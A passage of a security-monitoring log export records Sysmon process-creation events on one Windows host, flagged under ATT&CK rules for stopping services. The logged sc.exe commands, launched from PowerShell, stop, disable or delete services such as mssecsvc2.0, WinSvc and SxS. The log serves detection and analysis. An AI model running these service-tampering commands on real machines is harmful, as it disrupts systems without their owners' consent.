DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:28.947"",""processGuid"":""{df9fc3d3-b3d0-5ecf-0000-001086362b00}"",""processId"":""6544"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Windows_Update"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.845",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:51:28.866 +ProcessGuid: {df9fc3d3-b3d0-5ecf-0000-0010ae332b00} +ProcessId: 5616 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.0 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:28.876146100Z"",""eventRecordID"":""3186"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:28.866\r\nProcessGuid: {df9fc3d3-b3d0-5ecf-0000-0010ae332b00}\r\nProcessId: 5616\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:28.866"",""processGuid"":""{df9fc3d3-b3d0-5ecf-0000-0010ae332b00}"",""processId"":""5616"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.0"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.827",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:28.840 +ProcessGuid: {df9fc3d3-b3d0-5ecf-0000-0010b1322b00} +ProcessId: 2788 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config mssecsvc2.0 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config mssecsvc2.0 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:28.846472300Z"",""eventRecordID"":""3185"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:28.840\r\nProcessGuid: {df9fc3d3-b3d0-5ecf-0000-0010b1322b00}\r\nProcessId: 2788\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 
10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config mssecsvc2.0 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:28.840"",""processGuid"":""{df9fc3d3-b3d0-5ecf-0000-0010b1322b00}"",""processId"":""2788"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config mssecsvc2.0 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.790",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:28.761 +ProcessGuid: {df9fc3d3-b3d0-5ecf-0000-00109c302b00} +ProcessId: 2028 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
mssecsvc2.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:28.764376700Z"",""eventRecordID"":""3183"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:28.761\r\nProcessGuid: {df9fc3d3-b3d0-5ecf-0000-00109c302b00}\r\nProcessId: 2028\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:28.761"",""processGuid"":""{df9fc3d3-b3d0-5ecf-0000-00109c302b00}"",""processId"":""2028"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.724",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:28.647 +ProcessGuid: {df9fc3d3-b3d0-5ecf-0000-0010df2d2b00} +ProcessId: 7112 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:28.661164900Z"",""eventRecordID"":""3180"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:28.647\r\nProcessGuid: {df9fc3d3-b3d0-5ecf-0000-0010df2d2b00}\r\nProcessId: 7112\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:28.647"",""processGuid"":""{df9fc3d3-b3d0-5ecf-0000-0010df2d2b00}"",""processId"":""7112"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.688",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:28.537 +ProcessGuid: {df9fc3d3-b3d0-5ecf-0000-0010612a2b00} +ProcessId: 6936 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete SxS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SxS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:28.541523900Z"",""eventRecordID"":""3178"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:28.537\r\nProcessGuid: {df9fc3d3-b3d0-5ecf-0000-0010612a2b00}\r\nProcessId: 6936\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SxS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:28.537"",""processGuid"":""{df9fc3d3-b3d0-5ecf-0000-0010612a2b00}"",""processId"":""6936"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SxS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.671",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:28.481 +ProcessGuid: {df9fc3d3-b3d0-5ecf-0000-001044292b00} +ProcessId: 4996 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SxS +CurrentDirectory: C:\Users\John 
Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SxS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:28.499909600Z"",""eventRecordID"":""3177"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:28.481\r\nProcessGuid: {df9fc3d3-b3d0-5ecf-0000-001044292b00}\r\nProcessId: 4996\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SxS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
